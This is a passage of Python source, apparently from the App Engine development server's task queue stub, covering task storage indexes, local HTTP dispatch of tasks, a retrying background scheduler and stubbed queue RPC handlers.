[{'name': 'task-123', 'queue_name': 'default', 'url': '/update', 'method': 'GET', 'eta': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'body': '', 'headers': [('user-header', 'some-value') ('X-AppEngine-QueueName': 'update-queue'), ('X-AppEngine-TaskName': 'task-123'), ('X-AppEngine-TaskExecutionCount': '1'), ('X-AppEngine-TaskRetryCount': '1'), ('X-AppEngine-TaskETA': '1234567890.123456'), ('X-AppEngine-Development-Payload': '1'), ('X-AppEngine-TaskPreviousResponse': '300'), ('Content-Length': 0), ('Content-Type': 'application/octet-stream')] Raises: ValueError: A task request contains an unknown HTTP method type. """ tasks = [] now = datetime.datetime.utcnow() for _, _, task_response in self._sorted_by_eta: tasks.append(QueryTasksResponseToDict( self.queue_name, task_response, now)) return tasks @_WithLock def GetTaskAsDict(self, task_name): """Gets a specific task from this queue. Returns: A dictionary containing one task's attributes. E.g. [{'name': 'task-123', 'queue_name': 'default', 'url': '/update', 'method': 'GET', 'eta': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'body': '', 'headers': [('user-header', 'some-value') ('X-AppEngine-QueueName': 'update-queue'), ('X-AppEngine-TaskName': 'task-123'), ('X-AppEngine-TaskExecutionCount': '1'), ('X-AppEngine-TaskRetryCount': '1'), ('X-AppEngine-TaskETA': '1234567890.123456'), ('X-AppEngine-Development-Payload': '1'), ('X-AppEngine-TaskPreviousResponse': '300'), ('Content-Length': 0), ('Content-Type': 'application/octet-stream')] Raises: ValueError: A task request contains an unknown HTTP method type. 
""" task_responses = self._LookupNoAcquireLock(maximum=1, name=task_name) if not task_responses: return task_response, = task_responses if task_response.task_name() != task_name: return now = datetime.datetime.utcnow() return QueryTasksResponseToDict(self.queue_name, task_response, now) @_WithLock def PurgeQueue(self): """Removes all content from the queue.""" self._sorted_by_name = [] self._sorted_by_eta = [] self._sorted_by_tag = [] @_WithLock def _GetTasks(self): """Helper method for tests returning all tasks sorted by eta. Returns: A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects sorted by eta. """ return self._GetTasksNoAcquireLock() def _GetTasksNoAcquireLock(self): """Helper method for tests returning all tasks sorted by eta. Returns: A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects sorted by eta. """ assert self._lock.locked() tasks = [] for eta, task_name, task in self._sorted_by_eta: tasks.append(task) return tasks def _InsertTask(self, task): """Insert a task into the store, keeps lists sorted. Args: task: the new task. """ assert self._lock.locked() eta = task.eta_usec() name = task.task_name() bisect.insort_left(self._sorted_by_eta, (eta, name, task)) if task.has_tag(): bisect.insort_left(self._sorted_by_tag, (task.tag(), eta, name, task)) bisect.insort_left(self._sorted_by_name, (name, task)) self.task_name_archive.add(name) @_WithLock def RunTaskNow(self, task): """Change the eta of a task to now. Args: task: The TaskQueueQueryTasksResponse_Task run now. This must be stored in this queue (otherwise an AssertionError is raised). """ self._PostponeTaskNoAcquireLock(task, 0, increase_retries=False) @_WithLock def PostponeTask(self, task, new_eta_usec): """Postpone the task to a future time and increment the retry count. Args: task: The TaskQueueQueryTasksResponse_Task to postpone. This must be stored in this queue (otherwise an AssertionError is raised). new_eta_usec: The new eta to set on the task. 
This must be greater
        than the current eta on the task.
    """
    assert new_eta_usec > task.eta_usec()
    self._PostponeTaskNoAcquireLock(task, new_eta_usec)

  def _PostponeTaskNoAcquireLock(self, task, new_eta_usec,
                                 increase_retries=True):
    # Re-keys the task in the eta (and tag) indexes under the new eta.
    assert self._lock.locked()
    if increase_retries:
      self._IncRetryCount(task)
    name = task.task_name()
    eta = task.eta_usec()
    assert self._RemoveTaskFromIndex(
        self._sorted_by_eta, (eta, name, None), task)
    if task.has_tag():
      assert self._RemoveTaskFromIndex(
          self._sorted_by_tag, (task.tag(), eta, name, None), task)
    self._PostponeTaskInsertOnly(task, new_eta_usec)

  def _PostponeTaskInsertOnly(self, task, new_eta_usec):
    # Insert-half of postponing; caller must have removed the old entries.
    assert self._lock.locked()
    task.set_eta_usec(new_eta_usec)
    name = task.task_name()
    bisect.insort_left(self._sorted_by_eta, (new_eta_usec, name, task))
    if task.has_tag():
      tag = task.tag()
      bisect.insort_left(self._sorted_by_tag, (tag, new_eta_usec, name, task))

  @_WithLock
  def Lookup(self, maximum, name=None, eta=None):
    """Lookup a number of sorted tasks from the store.

    If 'eta' is specified, the tasks are looked up in a list sorted by 'eta',
    then 'name'. Otherwise they are sorted by 'name'. We need to be able to
    sort by 'eta' and 'name' because tasks can have identical eta. If you had
    20 tasks with the same ETA, you wouldn't be able to page past them, since
    the 'next eta' would give the first one again. Names are unique, though.

    Args:
      maximum: the maximum number of tasks to return.
      name: a task name to start with.
      eta: an eta to start with.

    Returns:
      A list of up to 'maximum' tasks.

    Raises:
      ValueError: if the task store gets corrupted.
    """
    return self._LookupNoAcquireLock(maximum, name, eta)

  def _IndexScan(self, index, start_key, end_key=None, max_rows=None):
    """Return the result of a 'scan' over the given index.

    The scan is inclusive of start_key and exclusive of end_key. It returns
    at most max_rows from the index.

    Args:
      index: One of the index lists, eg self._sorted_by_tag.
      start_key: The key to start at.
      end_key: Optional end key.
      max_rows: The maximum number of rows to yield.

    Returns:
      a list of up to 'max_rows' TaskQueueQueryTasksResponse_Task instances
      from the given index, in sorted order.
    """
    assert self._lock.locked()
    start_pos = bisect.bisect_left(index, start_key)
    end_pos = INF
    if end_key is not None:
      end_pos = bisect.bisect_left(index, end_key)
    if max_rows is not None:
      end_pos = min(end_pos, start_pos + max_rows)
    end_pos = min(end_pos, len(index))

    tasks = []
    for pos in xrange(start_pos, end_pos):
      # The task object is always the last element of an index tuple.
      tasks.append(index[pos][-1])
    return tasks

  def _LookupNoAcquireLock(self, maximum, name=None, eta=None, tag=None):
    assert self._lock.locked()
    if tag is not None:
      # '%s\x00' % tag is the smallest string greater than every key with
      # prefix exactly equal to tag, so the scan stays within one tag.
      return self._IndexScan(self._sorted_by_tag,
                             start_key=(tag, eta, name,),
                             end_key=('%s\x00' % tag, None, None,),
                             max_rows=maximum)
    elif eta is not None:

      return self._IndexScan(self._sorted_by_eta,
                             start_key=(eta, name,),
                             max_rows=maximum)
    else:

      return self._IndexScan(self._sorted_by_name,
                             start_key=(name,),
                             max_rows=maximum)

  @_WithLock
  def Count(self):
    """Returns the number of tasks in the store."""
    return len(self._sorted_by_name)

  @_WithLock
  def OldestTask(self):
    """Returns the task with the oldest eta in the store."""
    if self._sorted_by_eta:
      return self._sorted_by_eta[0][2]
    return None

  @_WithLock
  def Oldest(self):
    """Returns the oldest eta in the store, or None if no tasks."""
    if self._sorted_by_eta:
      return self._sorted_by_eta[0][0]
    return None

  def _LocateTaskByName(self, task_name):
    """Locate the index of a task in _sorted_by_name list.

    If the task does not exist in the list, return None.

    Args:
      task_name: Name of task to be located.

    Returns:
      Index of the task in _sorted_by_name list if task exists,
      None otherwise.
    """
    assert self._lock.locked()
    pos = bisect.bisect_left(self._sorted_by_name, (task_name,))
    if (pos >= len(self._sorted_by_name) or
        self._sorted_by_name[pos][0] != task_name):
      return None
    return pos

  @_WithLock
  def Add(self, request, now):
    """Inserts a new task into the store.

    Args:
      request: A taskqueue_service_pb.TaskQueueAddRequest.
      now: A datetime.datetime object containing the current time in UTC.

    Raises:
      apiproxy_errors.ApplicationError: If a task with the same name is
      already in the store, or the task is tombstoned.
    """
    # Reject live duplicates first, then tombstoned (previously used) names.
    if self._LocateTaskByName(request.task_name()) is not None:
      raise apiproxy_errors.ApplicationError(
          taskqueue_service_pb.TaskQueueServiceError.TASK_ALREADY_EXISTS)
    if request.task_name() in self.task_name_archive:
      raise apiproxy_errors.ApplicationError(
          taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)

    now_sec = calendar.timegm(now.utctimetuple())
    task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
    task.set_task_name(request.task_name())
    task.set_eta_usec(request.eta_usec())
    task.set_creation_time_usec(_SecToUsec(now_sec))
    task.set_retry_count(0)
    task.set_method(request.method())

    # Copy only the optional fields that were set on the request.
    if request.has_url():
      task.set_url(request.url())
    for keyvalue in request.header_list():
      header = task.add_header()
      header.set_key(keyvalue.key())
      header.set_value(keyvalue.value())
    if request.has_description():
      task.set_description(request.description())
    if request.has_body():
      task.set_body(request.body())
    if request.has_crontimetable():
      task.mutable_crontimetable().set_schedule(
          request.crontimetable().schedule())
      task.mutable_crontimetable().set_timezone(
          request.crontimetable().timezone())
    if request.has_retry_parameters():
      task.mutable_retry_parameters().CopyFrom(request.retry_parameters())
    if request.has_tag():
      task.set_tag(request.tag())
    self._InsertTask(task)

  @_WithLock
  def Delete(self, name):
    """Deletes a task from the store by name.

    Args:
      name: the name of the task to delete.

    Returns:
      TaskQueueServiceError.UNKNOWN_TASK: if the task is unknown.
      TaskQueueServiceError.INTERNAL_ERROR: if the store is corrupted.
      TaskQueueServiceError.TOMBSTONED: if the task was deleted.
      TaskQueueServiceError.OK: otherwise.
""" return self._DeleteNoAcquireLock(name) def _RemoveTaskFromIndex(self, index, index_tuple, task): """Remove a task from the specified index. Args: index: The index list that needs to be mutated. index_tuple: The tuple to search for in the index. task: The task instance that is expected to be stored at this location. Returns: True if the task was successfully removed from the index, False otherwise. """ assert self._lock.locked() pos = bisect.bisect_left(index, index_tuple) if index[pos][-1] is not task: logging.debug('Expected %s, found %s', task, index[pos][-1]) return False index.pop(pos) return True def _DeleteNoAcquireLock(self, name): assert self._lock.locked() pos = self._LocateTaskByName(name) if pos is None: if name in self.task_name_archive: return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK else: return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK old_task = self._sorted_by_name.pop(pos)[-1] eta = old_task.eta_usec() if not self._RemoveTaskFromIndex( self._sorted_by_eta, (eta, name, None), old_task): return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR if old_task.has_tag(): tag = old_task.tag() if not self._RemoveTaskFromIndex( self._sorted_by_tag, (tag, eta, name, None), old_task): return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR return taskqueue_service_pb.TaskQueueServiceError.OK @_WithLock def Populate(self, num_tasks): """Populates the store with a number of tasks. Args: num_tasks: the number of tasks to insert. 
""" def RandomTask(): """Creates a new task and randomly populates values.""" assert self._lock.locked() task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task() task.set_task_name(''.join(random.choice(string.ascii_lowercase) for x in range(20))) task.set_eta_usec(now_usec + random.randint(_SecToUsec(-10), _SecToUsec(600))) task.set_creation_time_usec(min(now_usec, task.eta_usec()) - random.randint(0, _SecToUsec(20))) task.set_url(random.choice(['/a', '/b', '/c', '/d'])) if random.random() < 0.2: task.set_method( taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST) task.set_body('A' * 2000) else: task.set_method( taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET) retry_count = max(0, random.randint(-10, 5)) task.set_retry_count(retry_count) task.set_execution_count(retry_count) if random.random() < 0.3: random_headers = [('nexus', 'one'), ('foo', 'bar'), ('content-type', 'text/plain'), ('from', 'user@email.com')] for _ in xrange(random.randint(1, 4)): elem = random.randint(0, len(random_headers) - 1) key, value = random_headers.pop(elem) header_proto = task.add_header() header_proto.set_key(key) header_proto.set_value(value) return task now_usec = _SecToUsec(time.time()) for _ in range(num_tasks): self._InsertTask(RandomTask()) class _TaskExecutor(object): """Executor for a task object. Converts a TaskQueueQueryTasksResponse_Task into a http request, then uses the httplib library to send it to the http server. """ def __init__(self, default_host, request_data): """Constructor. Args: default_host: a string to use as the host/port to connect to if the host header is not specified in the task. request_data: A request_info.RequestInfo instance used to look up state associated with the request that generated an API call. """ self._default_host = default_host self._request_data = request_data def _HeadersFromTask(self, task, queue): """Constructs the http headers for the given task. 
This function will remove special headers (values in BUILT_IN_HEADERS) and add the taskqueue headers. Args: task: The task, a TaskQueueQueryTasksResponse_Task instance. queue: The queue that this task belongs to, an _Queue instance. Returns: A list of tuples containing the http header and value. There may be be mutiple entries with the same key. """ headers = [] for header in task.header_list(): header_key_lower = header.key().lower() if header_key_lower == 'host' and queue.target is not None: headers.append( (header.key(), '.'.join([queue.target, self._default_host]))) elif header_key_lower not in BUILT_IN_HEADERS: headers.append((header.key(), header.value())) headers.append(('X-AppEngine-QueueName', queue.queue_name)) headers.append(('X-AppEngine-TaskName', task.task_name())) headers.append(('X-AppEngine-TaskRetryCount', str(task.retry_count()))) headers.append(('X-AppEngine-TaskETA', str(_UsecToSec(task.eta_usec())))) headers.append(('X-AppEngine-Fake-Is-Admin', '1')) headers.append(('Content-Length', str(len(task.body())))) if (task.has_body() and 'content-type' not in [key.lower() for key, _ in headers]): headers.append(('Content-Type', 'application/octet-stream')) headers.append(('X-AppEngine-TaskExecutionCount', str(task.execution_count()))) if task.has_runlog() and task.runlog().has_response_code(): headers.append(('X-AppEngine-TaskPreviousResponse', str(task.runlog().response_code()))) return headers def ExecuteTask(self, task, queue): """Construct a http request from the task and dispatch it. Args: task: The task to convert to a http request and then send. An instance of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task queue: The queue that this task belongs to. An instance of _Queue. Returns: Http Response code from the task's execution, 0 if an exception occurred. 
""" method = task.RequestMethod_Name(task.method()) headers = self._HeadersFromTask(task, queue) dispatcher = self._request_data.get_dispatcher() try: response = dispatcher.add_request(method, task.url(), headers, task.body() if task.has_body() else '', '0.1.0.2') except request_info.ModuleDoesNotExistError: logging.exception('Failed to dispatch task') return 0 return int(response.status.split(' ', 1)[0]) class _BackgroundTaskScheduler(object): """The task scheduler class. This class is designed to be run in a background thread. Note: There must not be more than one instance of _BackgroundTaskScheduler per group. """ def __init__(self, group, task_executor, retry_seconds, **kwargs): """Constructor. Args: group: The group that we will automatically execute tasks from. Must be an instance of _Group. task_executor: The class used to convert a task into a http request. Must be an instance of _TaskExecutor. retry_seconds: The number of seconds to delay a task by if its execution fails. _get_time: a callable that returns the current time in seconds since the epoch. This argument may only be passed in by keyword. If unset, use time.time. """ self._group = group self._should_exit = False self._next_wakeup = INF self._event = threading.Event() self._wakeup_lock = threading.Lock() self.task_executor = task_executor self.default_retry_seconds = retry_seconds self._get_time = kwargs.pop('_get_time', time.time) if kwargs: raise TypeError('Unknown parameters: %s' % ', '.join(kwargs)) def UpdateNextEventTime(self, next_event_time): """Notify the TaskExecutor of the closest event it needs to process. Args: next_event_time: The time of the event in seconds since the epoch. 
""" with self._wakeup_lock: if next_event_time < self._next_wakeup: self._next_wakeup = next_event_time self._event.set() def Shutdown(self): """Request this TaskExecutor to exit.""" self._should_exit = True self._event.set() def _ProcessQueues(self): with self._wakeup_lock: self._next_wakeup = INF now = self._get_time() queue, task = self._group.GetNextPushTask() while task and _UsecToSec(task.eta_usec()) <= now: if task.retry_count() == 0: task.set_first_try_usec(_SecToUsec(now)) response_code = self.task_executor.ExecuteTask(task, queue) if response_code: task.mutable_runlog().set_response_code(response_code) else: logging.error( 'An error occured while sending the task "%s" ' '(Url: "%s") in queue "%s". Treating as a task error.', task.task_name(), task.url(), queue.queue_name) now = self._get_time() if 200 <= response_code < 300: queue.Delete(task.task_name()) else: retry = Retry(task, queue) age_usec = _SecToUsec(now) - task.first_try_usec() if retry.CanRetry(task.retry_count() + 1, age_usec): retry_usec = retry.CalculateBackoffUsec(task.retry_count() + 1) logging.warning( 'Task %s failed to execute. This task will retry in %.3f seconds', task.task_name(), _UsecToSec(retry_usec)) queue.PostponeTask(task, _SecToUsec(now) + retry_usec) else: logging.warning( 'Task %s failed to execute. The task has no remaining retries. 
' 'Failing permanently after %d retries and %d seconds', task.task_name(), task.retry_count(), _UsecToSec(age_usec)) queue.Delete(task.task_name()) queue, task = self._group.GetNextPushTask() if task: with self._wakeup_lock: eta = _UsecToSec(task.eta_usec()) if eta < self._next_wakeup: self._next_wakeup = eta def _Wait(self): """Block until we need to process a task or we need to exit.""" now = self._get_time() while not self._should_exit and self._next_wakeup > now: timeout = self._next_wakeup - now self._event.wait(timeout) self._event.clear() now = self._get_time() def MainLoop(self): """The main loop of the scheduler.""" while not self._should_exit: self._ProcessQueues() self._Wait() class TaskQueueServiceStub(apiproxy_stub.APIProxyStub): """Python only task queue service stub. This stub executes tasks when enabled by using the dev_appserver's AddEvent capability. When task running is disabled this stub will store tasks for display on a console, where the user may manually execute the tasks. """ def __init__(self, service_name='taskqueue', root_path=None, auto_task_running=False, task_retry_seconds=30, _all_queues_valid=False, default_http_server='localhost', _testing_validate_state=False, request_data=None): """Constructor. Args: service_name: Service name expected for all calls. root_path: Root path to the directory of the application which may contain a queue.yaml file. If None, then it's assumed no queue.yaml file is available. auto_task_running: When True, the dev_appserver should automatically run tasks after they are enqueued. task_retry_seconds: How long to wait between task executions after a task fails. _testing_validate_state: Should this stub and all of its _Groups (and thus and all of its _Queues) validate their state after each operation? This should only be used during testing of the taskqueue_stub. request_data: A request_info.RequestInfo instance used to look up state associated with the request that generated an API call. 
""" super(TaskQueueServiceStub, self).__init__( service_name, max_request_size=MAX_REQUEST_SIZE, request_data=request_data) self._queues = {} self._all_queues_valid = _all_queues_valid self._root_path = root_path self._testing_validate_state = _testing_validate_state self._queues[None] = _Group( self._ParseQueueYaml, app_id=None, _all_queues_valid=_all_queues_valid, _update_newest_eta=self._UpdateNextEventTime, _testing_validate_state=self._testing_validate_state) self._auto_task_running = auto_task_running self._started = False self._task_scheduler = _BackgroundTaskScheduler( self._queues[None], _TaskExecutor(default_http_server, self.request_data), retry_seconds=task_retry_seconds) self._yaml_last_modified = None def StartBackgroundExecution(self): """Start automatic task execution.""" if not self._started and self._auto_task_running: task_scheduler_thread = threading.Thread( target=self._task_scheduler.MainLoop) task_scheduler_thread.setDaemon(True) task_scheduler_thread.start() self._started = True def Shutdown(self): """Requests the task scheduler to shutdown.""" self._task_scheduler.Shutdown() def _ParseQueueYaml(self): """Loads the queue.yaml file and parses it. Returns: None if queue.yaml doesn't exist, otherwise a queueinfo.QueueEntry object populated from the queue.yaml. 
""" if hasattr(self, 'queue_yaml_parser'): return self.queue_yaml_parser(self._root_path) if self._root_path is None: return None for queueyaml in ( 'queue.yaml', 'queue.yml', os.path.join('WEB-INF', 'appengine-generated', 'queue.yaml')): try: path = os.path.join(self._root_path, queueyaml) modified = os.stat(path).st_mtime if self._yaml_last_modified and self._yaml_last_modified == modified: return self._last_queue_info fh = open(path, 'r') except (IOError, OSError): continue try: queue_info = queueinfo.LoadSingleQueue(fh) self._last_queue_info = queue_info self._yaml_last_modified = modified return queue_info finally: fh.close() return None def _UpdateNextEventTime(self, callback_time): """Enqueue a task to be automatically scheduled. Note: If auto task running is disabled, this function is a no-op. Args: callback_time: The earliest time this task may be run, in seconds since the epoch. """ self._task_scheduler.UpdateNextEventTime(callback_time) def _GetGroup(self, app_id=None): """Get the _Group instance for app_id, creating a new one if needed. Args: app_id: The app id in question. Note: This field is not validated. """ if app_id not in self._queues: self._queues[app_id] = _Group( app_id=app_id, _all_queues_valid=self._all_queues_valid, _testing_validate_state=self._testing_validate_state) return self._queues[app_id] def _Dynamic_Add(self, request, response): """Add a single task to a queue. This method is a wrapper around the BulkAdd RPC request. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: The taskqueue_service_pb.TaskQueueAddRequest. See taskqueue_service.proto. response: The taskqueue_service_pb.TaskQueueAddResponse. See taskqueue_service.proto. 
""" bulk_request = taskqueue_service_pb.TaskQueueBulkAddRequest() bulk_response = taskqueue_service_pb.TaskQueueBulkAddResponse() bulk_request.add_add_request().CopyFrom(request) self._Dynamic_BulkAdd(bulk_request, bulk_response) assert bulk_response.taskresult_size() == 1 result = bulk_response.taskresult(0).result() if result != taskqueue_service_pb.TaskQueueServiceError.OK: raise apiproxy_errors.ApplicationError(result) elif bulk_response.taskresult(0).has_chosen_task_name(): response.set_chosen_task_name( bulk_response.taskresult(0).chosen_task_name()) def _Dynamic_BulkAdd(self, request, response): """Add many tasks to a queue using a single request. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See taskqueue_service.proto. response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See taskqueue_service.proto. """ assert request.add_request_size(), 'taskqueue should prevent empty requests' self._GetGroup(_GetAppId(request.add_request(0))).BulkAdd_Rpc( request, response) def GetQueues(self): """Gets all the application's queues. Returns: A list of dictionaries, where each dictionary contains one queue's attributes. E.g.: [{'name': 'some-queue', 'max_rate': '1/s', 'bucket_size': 5, 'oldest_task': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'tasks_in_queue': 12}, ...] The list of queues always includes the default queue. """ return self._GetGroup().GetQueuesAsDicts() def GetTasks(self, queue_name): """Gets a queue's tasks. Args: queue_name: Queue's name to return tasks for. Returns: A list of dictionaries, where each dictionary contains one task's attributes. E.g. 
[{'name': 'task-123', 'queue_name': 'default', 'url': '/update', 'method': 'GET', 'eta': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'body': '', 'headers': [('user-header', 'some-value') ('X-AppEngine-QueueName': 'update-queue'), ('X-AppEngine-TaskName': 'task-123'), ('X-AppEngine-TaskRetryCount': '0'), ('X-AppEngine-TaskETA': '1234567890.123456'), ('X-AppEngine-Development-Payload': '1'), ('Content-Length': 0), ('Content-Type': 'application/octet-stream')] Raises: ValueError: A task request contains an unknown HTTP method type. KeyError: An invalid queue name was specified. """ return self._GetGroup().GetQueue(queue_name).GetTasksAsDicts() def DeleteTask(self, queue_name, task_name): """Deletes a task from a queue, without leaving a tombstone. Args: queue_name: the name of the queue to delete the task from. task_name: the name of the task to delete. """ if self._GetGroup().HasQueue(queue_name): queue = self._GetGroup().GetQueue(queue_name) queue.Delete(task_name) queue.task_name_archive.discard(task_name) def FlushQueue(self, queue_name): """Removes all tasks from a queue, without leaving tombstones. Args: queue_name: the name of the queue to remove tasks from. """ if self._GetGroup().HasQueue(queue_name): self._GetGroup().GetQueue(queue_name).PurgeQueue() self._GetGroup().GetQueue(queue_name).task_name_archive.clear() def _Dynamic_UpdateQueue(self, request, unused_response): """Local implementation of the UpdateQueue RPC in TaskQueueService. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest. unused_response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse. Not used. """ self._GetGroup(_GetAppId(request)).UpdateQueue_Rpc(request, unused_response) def _Dynamic_FetchQueues(self, request, response): """Local implementation of the FetchQueues RPC in TaskQueueService. 
Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest. response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse. """ self._GetGroup(_GetAppId(request)).FetchQueues_Rpc(request, response) def _Dynamic_FetchQueueStats(self, request, response): """Local 'random' implementation of the TaskQueueService.FetchQueueStats. This implementation loads some stats from the task store, the rest with random numbers. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest. response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse. """ self._GetGroup(_GetAppId(request)).FetchQueueStats_Rpc(request, response) def _Dynamic_QueryTasks(self, request, response): """Local implementation of the TaskQueueService.QueryTasks RPC. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryTasksResponse. """ self._GetGroup(_GetAppId(request)).QueryTasks_Rpc(request, response) def _Dynamic_FetchTask(self, request, response): """Local implementation of the TaskQueueService.FetchTask RPC. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchTaskRequest. response: A taskqueue_service_pb.TaskQueueFetchTaskResponse. """ self._GetGroup(_GetAppId(request)).FetchTask_Rpc(request, response) def _Dynamic_Delete(self, request, response): """Local delete implementation of TaskQueueService.Delete. Deletes tasks from the task store. A 1/20 chance of a transient error. 
Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueDeleteRequest. response: A taskqueue_service_pb.TaskQueueDeleteResponse. """ self._GetGroup(_GetAppId(request)).Delete_Rpc(request, response) def _Dynamic_ForceRun(self, request, response): """Local force run implementation of TaskQueueService.ForceRun. Forces running of a task in a queue. This will fail randomly for testing if the app id is non-empty. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueForceRunRequest. response: A taskqueue_service_pb.TaskQueueForceRunResponse. """ if _GetAppId(request) is not None: if random.random() <= 0.05: response.set_result( taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR) elif random.random() <= 0.052: response.set_result( taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR) else: response.set_result( taskqueue_service_pb.TaskQueueServiceError.OK) else: group = self._GetGroup(None) if not group.HasQueue(request.queue_name()): response.set_result( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) return queue = group.GetQueue(request.queue_name()) task = queue.Lookup(1, name=request.task_name()) if not task: response.set_result( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK) return queue.RunTaskNow(task[0]) self._UpdateNextEventTime(0) response.set_result( taskqueue_service_pb.TaskQueueServiceError.OK) def _Dynamic_DeleteQueue(self, request, response): """Local delete implementation of TaskQueueService.DeleteQueue. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest. response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse. 
""" app_id = _GetAppId(request) if app_id is None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED) self._GetGroup(app_id).DeleteQueue_Rpc(request, response) def _Dynamic_PauseQueue(self, request, response): """Local pause implementation of TaskQueueService.PauseQueue. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueuePauseQueueRequest. response: A taskqueue_service_pb.TaskQueuePauseQueueResponse. """ app_id = _GetAppId(request) if app_id is None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED) self._GetGroup(app_id).PauseQueue_Rpc(request, response) def _Dynamic_PurgeQueue(self, request, response): """Local purge implementation of TaskQueueService.PurgeQueue. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest. response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse. """ self._GetGroup(_GetAppId(request)).PurgeQueue_Rpc(request, response) def _Dynamic_DeleteGroup(self, request, response): """Local delete implementation of TaskQueueService.DeleteGroup. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueDeleteGroupRequest. response: A taskqueue_service_pb.TaskQueueDeleteGroupResponse. 
""" app_id = _GetAppId(request) if app_id is None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED) if app_id in self._queues: del self._queues[app_id] else: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) def _Dynamic_UpdateStorageLimit(self, request, response): """Local implementation of TaskQueueService.UpdateStorageLimit. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueUpdateStorageLimitRequest. response: A taskqueue_service_pb.TaskQueueUpdateStorageLimitResponse. """ if _GetAppId(request) is None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED) if request.limit() < 0 or request.limit() > 1000 * (1024 ** 4): raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST) response.set_new_limit(request.limit()) def _Dynamic_QueryAndOwnTasks(self, request, response): """Local implementation of TaskQueueService.QueryAndOwnTasks. Must adhere to the '_Dynamic_' naming convention for stubbing to work. See taskqueue_service.proto for a full description of the RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse. Raises: InvalidQueueModeError: If target queue is not a pull queue. """ self._GetGroup().QueryAndOwnTasks_Rpc(request, response) def _Dynamic_ModifyTaskLease(self, request, response): """Local implementation of TaskQueueService.ModifyTaskLease. Args: request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest. response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse. Raises: InvalidQueueModeError: If target queue is not a pull queue. 
    """
    self._GetGroup().ModifyTaskLease_Rpc(request, response)

  def get_filtered_tasks(self, url=None, name=None, queue_names=None):
    """Get the tasks in the task queue with filters.

    Args:
      url: A URL that all returned tasks should point at.
      name: The name of all returned tasks.
      queue_names: A list of queue names to retrieve tasks from. If left blank
        this will get default to all queues available.

    Returns:
      A list of taskqueue.Task objects.
    """
    all_queue_names = [queue['name'] for queue in self.GetQueues()]

    # Accept a single queue name as well as a list; basestring covers both
    # str and unicode (this module targets Python 2).
    if isinstance(queue_names, basestring):
      queue_names = [queue_names]

    # No filter given: search every known queue.
    if queue_names is None:
